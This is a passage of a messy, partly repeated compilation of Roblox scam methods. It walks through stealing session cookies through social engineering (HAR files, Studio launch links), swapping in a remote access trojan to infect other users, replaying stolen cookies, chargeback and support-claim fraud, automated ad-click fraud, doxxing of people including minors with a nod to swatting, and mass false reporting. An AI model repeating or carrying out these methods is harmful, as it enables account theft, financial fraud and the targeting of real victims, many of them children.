3.)After that make Account 3 send the limited to your main and just forget about
those accounts. Repeat the process
with new accounts and keep doing this until you reach around the 100k limited area
which you will be making 100k
per a couple of days. Also, you can sell the limiteds for ROBUX.
friend made this new game and he’s hiring mods would you be interested” IF THEY SAY
The first video what to do after you get their authentication second video is what
you send them
oh sorry first video I forgot to mention you want to press try it out and then go
to roblox.com and you should be signed in

Reverse Rat Method

1.) Download a RAT maker somewhere or if you have one

2.) Now find a Discord server where a guy is posting RATs "image-loggers","nitro-
snipers","limited-snipers" make sure they are all free!

3.) Once they send you their RAT you need to rename it to the exact name as a RAT
make sure you copy the icon also using resource hacker if it has an icon

4.) Tell them to screen share them opening their RAT but instead send them your RAT
after they open it you logged them. Some people may not screen share if they refuse
to tell them to screen record themselves opening it

5.) You have a 50/50 chance out of beaming with this method because most of the
people will disable their anti-virus to open up the EXE and if it's inside of a
folder they'll whitelist that Application in Windows Defender to open it

Studio Method
1. Go to trade hangouts or any other game of your taste, and seek a target. Look
for someone with around 40k-100k rap,

if you have 200k rap it highers the success rate, makes it look more believable.

2. Go around trade hangout (or any other game of your taste) saying "can u build,
do gfx or script?" paying 15k Robux upfront.

3. They say yes and think that they are scamming you, but are really getting
scammed themselves.

4. Ask for their discord and add them.

5. Now when have them added say "okay 1 minute", then say your team create isn't

6. Say "can you send me your teamcreate code?" and tell them you'll show them how.
7. By now they are confused, so you tell them to click edit on a game in studio.

8. Once the did so, a notification will pop up asking them if they want to open up

7. Tell them to press CTRL+SHIFT+J to open up the developer console.

9. Now that they're in the developer console, you tell them to scroll all the way
to the bottom and find their "Gamelaunch link".

10. Tell them to copy it and send it to you, if they question it tell them it's a
link that allows you to open up the game, since your studio wont let you.

11. Now paste their link in another tab and it'll open ROBLOX studio on their

12. Now you go to manange plugins in roblox studio and find plugins.

13. You're now on their account, do whatever you want!

Audio Har Method -

1) Find a victim and say you will pay them robux if they help you. Get them to add
you on discord
2) On discord, tell them they need to download an audio for you, and you will pay
the 2k if they do it correctly.
3) Give them a random audio, and tell them to press ctrl + shift + i (inspect).
Tell them to go to network; and refresh the page
4) Tell them to scroll to the top; and it should say the name of the audio.
5) Tell them to right click that, and click save all as HAR with content.
6) Tell them to send you the .har file.
7) Open the file with notepad and press ctrl + f and put "cookie" in the box and
click "find next". If their cookie doesn't show up the first time you click it; do
it again until it goes to their .ROBLOSECURITY.

message hider
```TEXT ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| _ _
_ _ _ _ LINK```



Apple Chargeback:
1. Buy robux on an alt.

Make sure the alt is 2+ years old.

2. After around 12-24 hours, Apple will send you the receipt of the purchase.

3. Go to report a problem, and request a refund.

4. For the reason, select “a child or minor made this purchase without my

5. Your money will be refunded within 12-24 hours.

To avoid getting banned, buy the robux on a vpn, and then log back in to the
account on your normal ip.

If roblox does not refund the money, message spanish roblox support and request a
refund from them, they should respond and refund your money.

< ======================================================== >


X. CB means chargeback.
X. Please keep in mind people will try to scare you into thinking this is illegal.
This is completely legal, don't let anyone scare you.
X. Abuses ROBLOX instant CB (chargeback) feature.

< ======================================================== >

Roblox has a feature and it's called "instant charge back" feature on their PayPal,
meaning any user that desires to chargeback what they want. regardless of the price
however, this does result in an account termination.

This is a quick and easy method to get get free Robux or free money, good luck n
don't abuse it too much. These methods are usually monitored by Roblox.
First of all you've gotta purchase a set ROBUX or Premium on the site ON AN
ALTERNATIVE ACCOUNT via a PayPal account that you have access to.

After that you've gotta USD sell the ROBUX or transfer the ROBUX to a group that
one of your other groups own

After this you've got to head to the ROBUX transaction on PayPal, scroll to the
bottom and press "Report a problem", after pressing that, click "I didn't receive
an item I purchased" and type in the description "I did not get the ROBUX that I

Within 2 days ROBLOX support should fully refund you the money that you spent on
the ROBUX, allowing you to keep the ROBUX that you put on the group or sold for

Getting a lot of limiteds and ROBUX may seem hard but it is really not, a lot of
use this method and it has worked countless times. By using my steps you are
your extra limiteds and ROBUX and your safety.

There are 3 steps:

1.)Getting a VPN and making 3 accounts
2.)Emailing ROBLOX


1.) First, you will need to get a VPN, I recommend a chrome extension VPN like
dotVPN. After create an ROBLOX account
with BC or buy 2 stolen cheap BC account on v3rm for 1 dollar each with VPN on and
send a trade for any limited worth 4k
ROBUX + to your main. Turn off the VPN and go on your main and accept the trade.
After turn on the VPN and go on Account 1.
Make sure you switch the VPN's IP every time you switch accounts and make sure
you're not using the same IP. Turn on the VPN with a new IP address
and go on Account 2 which then you will send a PM to Account 1 like this: "Hey,
want free ROBUX? Go to freerobux.com".
Then go on Account 1 and send all your items to Account 2. After creating Account 3
(different VPN IP) and send a PM to
Account 2 like: "Send me a trade, I accept most good trades". Then make Account 3
send for all limiteds on Account 2
and make Account 2 accept.

2.)After that email ROBLOX with Account 1 (the account you made, not bought on
v3rm) that all your ROBUX and Limiteds
are gone and that you're a concerned parent and threaten them by asking for a phone
number and stuff. After a couple
of days, they will say that you will get the limited back OR MOST LIKELY they will
give you the amount of ROBUX the
limited was worth.

3.)After that make Account 3 send the limited to your main and just forget about
those accounts. Repeat the process
with new accounts and keep doing this until you reach around the 100k limited area
which you will be making 100k
per a couple of days. Also, you can sell the limiteds for ROBUX.

Adopt Me Dupe

1) Trade all of your pets to an alt account and tell Adopt Me you were scammed.
2) On your alt account, trade your pets for other pets and trade the new pets to
two different alt accounts.
3) Send the new pets to your account that was "scammed" and your Adopt Me pets
should be duplicated.
Second method :1) Create an ad in Marketplace servers, saying that you're selling
Adopt Me pets.
2) Sell the pets and use a middleman.
3) Request your pets back from Adopt Me using the Trade License and use the trade
where you gave the user the pets as proof.

1k A DAY
1k$ A Day AFK

Reliable Method for making $1,000+ monthly by AFKing.

This can make $15-$1,000+ monthly (depending on how you long you do it)
(This can be difficult to setup, but it is definitely worth it.)
From what I know this method has been completely private between at least like 10
people in the CS:GO Cheating community, and since I don't care much about this
method I am releasing it.

Step 1. You're going to need to buy a CS:GO hosting service and start a server.
This is required, however the server will only be needed for one day and you will
never have to worry about it again.

Step 2. Make an account at https://portal.motdgd.com/registration (it will ask you

for your address and stuff, just literally use fake information.

Step 3. Once you have made an account, go to https://portal.motdg...hboard/overview

and click on the Plugins tab. From there select and install the plugin to your
Installation of the MOTDGD plugin is a bitch, but it is worth it. There are some
tutorials on youtube to help install it.

Step 4. Once the plugin is installed and you see an ad when you load into your
server you should be able to get the link the ad is running through.
(I havent needed to get my ad link in over 6 months or something, so I dont exactly
remember where it is, but you need to find it.)

Step 5. Now, if you do not already have Auto Hotkey installed, you need to install
it now. It will be used for automating clicking when you AFK your computer.

(Here is some code for an AHK script that will auto click on your ad link 60 times,
wait 30 seconds so the ad finishes playing, and then close all the ads and restart
the process.)
default keybinds: F10 to start the script, F7 to pause, F8 to close.

AutoClick :https://pastebin.com/YP9G9biP

Step 6. Open a game that does not take much processing power, Press Shift+Tab to
open the steam panel, goto your friends and find someone who hasnt been online in a
long time and send them a message that is your ad link. When you send the message,
if you click the link it should open your ad page and run a video/banner ad. Resize
the window the ad plays in so it does not overlap the link you sent to your friend,
and then simply open the AHK script I posted above, hover over the link, then press
F10. it should start spam opening and closing the ads which is perfect.

From here you just afk this whenever you sleep, or go to school, or any time you
arent on your computer. my friend went as far as buying a sitty laptop to afk this
on 24/7. He even afk'd it on his main pc when he wasnt using that so you really can
afk this on as many PC's as you want.

MOTDGD is very kind when it comes to showing us ad rates based on certain

For the best results I suggest using a VPN set to which country has the highest ad
payout at the time. This is typically Australia.

I wouldn't suggest going over $1,000 a month. Sometimes when you make too much
money a month MOTDGD will check your account and ban you for this.


try to find some info on them
location, city, state
name and last name
phone num
and use facebook or other social media for help if you need extra help finding some
info on them


if you have they ip then

goto https://ipinfo.io/, paste ip and then get they city and state, you also gotta
have they first and lastname (they must be above 18+)
now goto https://searchpeoplefast.com/ or https://whitepages.com/ and they info

goto https://whitepages.com/ or https://searchpeoplefast.com/ and enter they name

and last name, city and state



--i didnt make this just copied and paste

Dox Method

1. Find your victim.

2. Once you did, try to develop some time of friendship with them.
3. Once you’ve became friends, try to ask if they have instagram, or facebook, or
any social media they might have their name on.
4. If they’re under 18+ try to ask them what their mom/dads name is but try not to
be sus.
5. Ask what country they live in. once they tel you be like oh fr? me too! And then
say what city? and once they tell you, you have all the information you need about
6. Once you have either their first and last name, or their parents first and last,
go to https://whitepages.com/person .
7. Next, you wanna type in their first and paste name or their parents first and
last name AND their city.
8. A page should pull up about their relatives, recent addresses, etc.
9. You can dox/swat them or whatever you want. BUT BE CAREFUL
i’m not responsible for anything that happens



Ban User Method

method 1
upload a nsfw picture
method 2
Pretend to be their parent and email roblox saying that you want to deactivate your
kids account (enter username) because he/she is playing games all day
method 3
If you beam an account and you want to term it Or just a bypass and insult peoples

1. First , get the extension Edit This Cookie to Google Chrome

2. Once you have the extension installed and have your cookie ready, you want to go
to Roblox.com and click on the extension on your topbar.

3. A dropdown will appear and you want to navigate to ".ROBLOSECURITY"

4. Once on RobloxSecurity replace the current cookie with the cookie you grabbed
and hit the checkmark at the bottom of the dropdown

5. Refresh your page and you should be signed into their account

EditThisCookie is a cookie manager. You can add, delete, edit, search, protect and
block cookies!

BTW if the victim logs out of their account you won't be able to login with the
cookies anymore as it will be reset...

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